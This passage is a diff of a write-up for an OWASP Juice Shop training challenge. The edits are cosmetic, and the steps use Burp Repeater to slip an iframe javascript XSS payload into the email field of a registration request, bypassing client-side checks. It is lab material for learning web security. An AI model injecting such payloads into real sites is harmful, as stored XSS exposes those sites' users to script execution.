IshakAtes/owasp_juice_shop/3-Star Challenges/report-02-ClientSide-XSS-Protection.md

     "securityAnswer":"zaya"
 }
 ```
-5. Right-click inside the request and select `Send to Repeater klicken`.
-Then switch to the Repeater tab.
+5. Right-click inside the request and select `Send to Repeater`.
+Then switch to the `Repeater` tab.
 Here we manipulate the JSON and insert our payload `<iframe src="javascript:alert('xss')">` into the `email` field:
 ``` JSON
 "email": "<iframe src='javascript:alert(`xss`)'>"
 ```

-6. Click Send.
+6. Click `Send`.
 The response should confirm successful account creation:
 ``` JSON
 HTTP/1.1 201 Created
 Access-Control-Allow-Origin: *